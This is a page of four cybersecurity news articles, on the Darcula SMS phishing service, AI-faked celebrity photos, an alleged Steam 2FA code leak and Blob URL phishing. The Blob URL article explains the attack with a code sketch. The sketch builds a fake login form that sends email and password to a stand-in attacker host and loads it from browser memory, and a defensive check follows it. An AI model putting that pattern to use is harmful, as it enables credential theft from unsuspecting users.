Cybersecurity
Darcula PhaaS Scam Steals 884,000 Credit Cards with 13 Million Clicks

A massive phishing operation known as Darcula PhaaS (Phishing-as-a-Service) has compromised 884,000 credit cards through 13 million clicks on malicious links sent via text messages, targeting victims worldwide. The cybercrime campaign, which unfolded over seven months between 2023 and 2024, was uncovered by a coordinated investigation involving researchers from NRK, Bayerischer Rundfunk, Le Monde, and Norwegian security firm Mnemonic. The Darcula platform, used by over 600 operators, exploited 20,000 domains to impersonate well-known brands, underscoring the scale of modern phishing operations and the risk they pose to consumers globally.
Darcula’s phishing texts often masqueraded as legitimate notifications, such as road toll fines or package shipping updates, luring users into clicking links that led to fraudulent websites designed to steal account credentials and payment information. The operation targeted both Android and iPhone users across more than 100 countries, with Mnemonic’s investigation revealing the scale of the heist: 884,000 credit cards stolen from 13 million clicks. The platform’s infrastructure, dubbed “Magic Cat,” served as the backbone of the operation, enabling cybercriminals to orchestrate large-scale attacks with alarming efficiency. Researchers infiltrated Darcula’s Telegram groups, uncovering evidence of SIM farms, modems, and lavish lifestyles funded by the scam, including photos of operators running stolen card details through payment terminals.
The investigation, detailed in reports from outlets like BleepingComputer, traced Darcula’s evolution, noting significant updates by February 2025. The platform introduced features like auto-generated phishing kits for any brand, a credit card to virtual card converter, and a simplified admin panel, making it easier for operators to execute scams. By April 2025, Darcula had integrated generative AI, leveraging large language models (LLMs) to craft custom phishing messages in any language and on any topic, further amplifying its reach and sophistication. This use of AI underscores the growing challenge of combating digital fraud, as cybercriminals exploit advanced technology to target unsuspecting users.
Darcula’s operators, primarily communicating in Chinese within closed Telegram groups monitored by NRK for over a year, relied on SIM farms and hardware setups to send mass text messages and process stolen cards. A Thai-based operator, identified as “x66/Kris,” emerged as a high-ranking figure in the operation, managing significant volumes of malicious traffic. Despite claims from the platform’s alleged creator—a former employee of a Chinese firm—that Magic Cat was intended for legitimate website creation, a new version was released even after promises to shut it down, raising concerns about accountability in the cybercrime ecosystem. All findings from the investigation have been shared with law enforcement authorities to aid in dismantling the operation.
The scale of the Darcula scam has sparked widespread concern about the vulnerability of consumers to phishing attacks, particularly via SMS, a medium often perceived as more trustworthy than email. The 20,000 domains used to spoof brands highlight the difficulty of detecting such scams, as they often mimic legitimate entities with high fidelity. This incident follows a broader surge in SMS-based scams, with CTM360 tracking a global rise in fraudulent texts posing as rewards or toll notifications, further complicating efforts to protect users. The Darcula operation’s success—stealing nearly a million credit cards—underscores the urgent need for better user education on identifying phishing attempts and stronger safeguards from telecom providers.
The Darcula PhaaS scam also raises questions about the role of generative AI in cybercrime, as its integration into phishing kits has made scams more convincing and harder to detect. While AI can be a powerful tool for innovation, its misuse by cybercriminals poses a significant threat, as seen in Darcula’s ability to craft tailored phishing messages at scale. This development mirrors broader trends in the cybersecurity landscape, where AI-driven attacks are becoming more prevalent, challenging traditional defense mechanisms. Consumers are advised to remain vigilant, avoiding unsolicited links in text messages and verifying the legitimacy of communications directly with the purported sender, especially for sensitive topics like payments or account updates.
The fallout from Darcula’s operation is likely to have far-reaching implications for both victims and the broader digital ecosystem. With 884,000 credit cards compromised, affected individuals face the risk of financial loss, identity theft, and long-term credit damage, necessitating immediate action such as freezing cards and monitoring accounts for suspicious activity. On a larger scale, the incident highlights the need for international cooperation to combat cybercrime, as Darcula’s global reach demonstrates the borderless nature of such threats. As law enforcement works to dismantle the operation, the case serves as a stark reminder of the importance of robust cybersecurity measures in protecting consumers from increasingly sophisticated scams.
The Darcula PhaaS scam is a wake-up call for individuals, businesses, and policymakers alike, emphasizing the need for heightened awareness and stronger defenses against phishing attacks. As cybercriminals continue to leverage advanced technologies like AI, staying one step ahead will require a concerted effort from all stakeholders in the digital space. Have you or someone you know been affected by a phishing scam like Darcula, and what steps do you take to stay safe online? Share your experiences and insights in the comments—we’d love to hear your thoughts on this alarming cyberthreat.
Cybersecurity
Billie Eilish AI Fakes Flood Internet: Singer Slams “Sickening” Doctored Met Gala Photos

Billie Eilish AI fakes are the latest example of deepfake technology running rampant, as the Grammy-winning singer has publicly debunked viral images claiming to show her at the 2025 Met Gala. Eilish, who confirmed she did not attend the star-studded event, called the AI-generated pictures “sickening,” highlighting the growing crisis of celebrity image misuse and online misinformation in the USA and beyond.
LOS ANGELES, USA – The internet was abuzz with photos seemingly showing Billie Eilish at the 2025 Met Gala, but the singer herself has forcefully shut down the rumors, revealing the Billie Eilish AI fakes were entirely fabricated. In a recent social media statement, Eilish confirmed she was nowhere near the iconic fashion event and slammed the AI-generated images as “sickening.” This incident throws a harsh spotlight on the rapidly escalating problem of deepfake technology and the unauthorized use of celebrity likenesses, a concern increasingly impacting public figures and stirring debate across the United States.
The fake images, which depicted Eilish in various elaborate outfits supposedly on the Met Gala red carpet, quickly went viral across platforms like X (formerly Twitter) and Instagram. Many fans initially believed them to be real, underscoring the sophisticated nature of current AI image generation tools. However, Eilish took to her own channels to set the record straight. “Those are FAKE, that’s AI,” she reportedly wrote, expressing her disgust at the digitally manipulated pictures. “It’s sickening to me how easily people are fooled.” Her frustration highlights a growing unease about how AI can distort reality, a problem also seen with other AI systems, such as Elon Musk’s Grok AI spreading misinformation.
Billie Eilish reacts to people trashing her Met Gala outfit this year, which was AI-generated as she wasn’t there:
“Seeing people talk about what I wore to this year’s Met Gala being trash… I wasn’t there. That’s AI. I had a show in Europe that night… let me be!” pic.twitter.com/z9Rj4QEAKQ
— Pop Base (@PopBase) May 15, 2025
This latest instance of Billie Eilish AI fakes is far from an isolated event. The proliferation of deepfake technology, which uses artificial intelligence to create realistic but fabricated images and videos, has become a major concern. Celebrities are frequent targets, with their images often used without consent in various contexts, from harmless parodies to malicious hoaxes and even non-consensual pornography. The ease with which these fakes can be created and disseminated poses a significant threat to personal reputation and public trust. The entertainment industry is grappling with AI on multiple fronts, including stars urging for copyright protection against AI.
The “Sickening” Reality of AI-Generated Content
Eilish’s strong condemnation of the Billie Eilish AI fakes reflects a broader sentiment among artists and public figures who feel increasingly vulnerable to digital manipulation. The incident raises critical questions about:
- Consent and Likeness: The unauthorized use of a person’s image, even if AI-generated, infringes on their rights and control over their own persona.
- The Spread of Misinformation: When AI fakes are believable enough to dupe the public, they become potent tools for spreading false narratives.
- The Difficulty in Detection: As AI technology advances, telling real from fake becomes increasingly challenging for the average internet user. This is a concern that even tech giants are trying to address, with OpenAI recently committing to more transparency about AI model errors.
The Met Gala, known for its high fashion and celebrity attendance, is a prime target for such fabrications due to the intense public interest and the visual nature of the event. The Billie Eilish AI fakes serve as a stark reminder that even high-profile events are not immune to this form of digital deception. The potential for AI to be misused is a widespread concern, touching various aspects of life, including the use of AI by police forces.
Legal and ethical frameworks are struggling to keep pace with the rapid advancements in AI. While some jurisdictions are beginning to explore legislation to combat malicious deepfakes, the global and often anonymous nature of the internet makes enforcement difficult. For victims like Billie Eilish, speaking out is one of the few recourses available to debunk the fakes and raise awareness. As AI becomes more integrated into content creation, the lines between authentic and synthetic media will continue to blur, making critical thinking and media literacy more important than ever for consumers. The public’s desire for authenticity is also pushing for clearer identification, like the calls for AI chatbots to disclose their non-human status.
Cybersecurity
Alleged 89 Million Steam 2FA Codes Leaked, Twilio Denies Breach

On May 14, 2025, a database allegedly containing 89 million Steam 2FA (two-factor authentication) codes surfaced online, drawing immediate attention from the security community. The claim has not been verified by official sources, but if genuine it would represent a significant breach of authentication data.
According to the listing, the leak included sensitive details such as Steam account names, email addresses, and 2FA codes, all part of a database advertised on a hacking forum for $5,000. The data reportedly contained historic SMS text messages with one-time passcodes, including recipient phone numbers, confirmation codes for account access, and metadata like timestamps and delivery statuses. Because such codes are central to securing user accounts, this information, if authentic, could expose users to phishing attacks and session hijacking, where hackers intercept or replay 2FA codes to bypass login protections.
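To make the advertised fields concrete, here is a minimal sketch of what a single record might look like, modeled as a TypeScript interface. The shape is inferred purely from the forum listing’s description; the dump itself remains unverified, and the field names are invented for illustration.

```typescript
// Hypothetical shape of one leaked record, inferred from the fields
// described in the listing; the real dump's format is unverified.
interface AllegedSmsRecord {
  recipientPhone: string;  // phone number the SMS was sent to
  messageBody: string;     // e.g. "Your Steam confirmation code is ..."
  oneTimeCode: string;     // the 2FA passcode carried in the message
  sentAt: string;          // timestamp metadata
  deliveryStatus: string;  // carrier delivery-status metadata
}
```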
Following the emergence of these claims, Twilio, a communications platform reportedly involved, denied any breach. The company stated that it found no evidence of a compromise of its systems, dismissing the notion that the data originated from its platforms. The denial is significant because Twilio provides SMS and authentication services for many platforms, reportedly including Steam. If verified, the incident could prompt a reevaluation of how SMS-based 2FA is implemented.
As of now, Steam operator Valve Corporation has not commented on the alleged breach, leaving users uncertain about the safety of their accounts and amplifying concerns about personal information and account security. The incident highlights the broader challenge of maintaining user trust in an era of increasingly sophisticated digital threats.
The ongoing focus is on verifying the leak’s authenticity and understanding its implications. Whatever the outcome, the episode is a stark reminder that a second factor is only as strong as the pipeline that delivers it, and that SMS-based codes in particular depend on third-party infrastructure. What are your thoughts on the alleged Steam 2FA code leak and Twilio’s denial: does it signal a broader issue with online security, or is it an isolated incident? Share your insights in the comments; we’re eager to hear your perspective on this developing story.
Cybersecurity
New Phishing Attack Uses Blob URLs to Steal Passwords

Cybercriminals have developed a sophisticated phishing technique that leverages Blob URLs to create fake login pages within users’ browsers, stealing passwords and even encrypted messages, according to a Hackread report. This method, uncovered by Cofense Intelligence, bypasses traditional email security systems by generating malicious content locally, making it nearly undetectable. As phishing attacks grow more advanced, this new tactic highlights the urgent need for updated defenses and user awareness to protect sensitive data.
The attack begins with a phishing email that appears legitimate, often redirecting users through trusted platforms like Microsoft’s OneDrive before leading them to a fake login page. Unlike typical phishing sites hosted on external servers, these fake pages are created using Blob URLs—temporary local content generated within the user’s browser. TechRadar explains that because Blob URLs are not hosted on the public internet, security systems that scan emails for malicious links cannot easily detect them. The result is a convincing login page that captures credentials, such as passwords for tax accounts or encrypted messages, as detailed by Forbes. This stealthy approach mirrors trends in AI-driven cyber threats, where attackers exploit technology to evade detection.
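To illustrate the mechanism (not the actual kit, which has not been published), here is a minimal TypeScript sketch of how any script can assemble a page entirely from browser memory; the markup and the attacker.example endpoint are placeholders invented for this example.

```typescript
// Minimal sketch: wrap HTML in an in-memory Blob and mint a local
// object URL for it. The markup and endpoint below are placeholders,
// not artifacts from the actual campaign.
const fakePageHtml = `
  <form action="https://attacker.example/collect" method="post">
    <input name="email" placeholder="Email">
    <input name="password" type="password" placeholder="Password">
    <button type="submit">Sign in</button>
  </form>`;

const blob = new Blob([fakePageHtml], { type: "text/html" });
const blobUrl = URL.createObjectURL(blob); // e.g. "blob:https://site.example/1db6..."

// Navigating here renders the form from browser memory alone; the page
// itself never travels over the network, so an email gateway that
// follows and scans links has nothing remote to fetch.
window.location.href = blobUrl;
```

The object URL is scoped to the victim’s own browser session, which is precisely why, as the reports note, link-scanning defenses have no server-hosted page to inspect.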
Cofense Intelligence, as reported by Security Boulevard, first detected this technique in mid-2022, but its use has surged recently. The phishing campaigns often lure users with prompts to log in to view encrypted messages, access tax accounts, or review financial alerts, exploiting trust in familiar brands. Cybersecurity News highlights that Blob URLs start with “blob:http://” or “blob:https://”, a detail users can check to identify potential threats. However, the complexity of these attacks makes them hard to spot, especially since AI-based security tools are still learning to differentiate between legitimate and malicious Blob URLs, a challenge also seen in AI privacy debates about evolving tech risks.
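Building on that prefix detail, a rough client-side check might look like the following sketch; the helper name and click listener are invented here and are not part of any shipped security product.

```typescript
// A rough heuristic based on the "blob:" prefix detail above.
function isBlobUrl(href: string): boolean {
  return href.startsWith("blob:http://") || href.startsWith("blob:https://");
}

// Warn whenever a clicked link resolves to locally generated content.
document.addEventListener("click", (event) => {
  const target = event.target as Element | null;
  const link = target?.closest("a");
  if (link && isBlobUrl(link.href)) {
    console.warn("Link points at content generated inside this browser:", link.href);
  }
});
```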
Protecting against this threat requires a multi-layered approach. Experts recommend avoiding clicking on links in unsolicited emails, especially those prompting logins, and verifying URLs directly with trusted sources. Using two-factor authentication (2FA) can add an extra layer of security, even if credentials are stolen. Organizations should also invest in advanced email security solutions that can detect unusual redirect patterns, as traditional Secure Email Gateways (SEGs) often fail to catch these attacks, per Security Boulevard. These protective measures align with strategies in AI communication tools, which aim to secure user interactions in digital spaces.
The broader implications of Blob URL phishing are significant. As remote work and digital transactions increase, the risk of credential theft grows, potentially leading to financial fraud or data breaches. The digital divide further complicates the issue, as not all users have the tools or knowledge to recognize such threats, a concern echoed in AI accessibility efforts. Additionally, the misuse of legitimate technologies like Blob URLs, which services such as YouTube use to stream video data held in the browser, underscores the need for better regulation, a theme that also runs through AI language tool debates about ethical tech deployment.
This new phishing tactic serves as a wake-up call for both users and security providers. As cybercriminals continue to innovate, staying ahead requires constant vigilance, improved technology, and widespread education on digital safety. The rise of Blob URL attacks highlights the evolving nature of cyber threats and the importance of proactive defense strategies. What do you think about this sneaky phishing method—how can we better protect ourselves online? Share your thoughts in the comments—we’d love to hear your perspective on this growing cybersecurity challenge.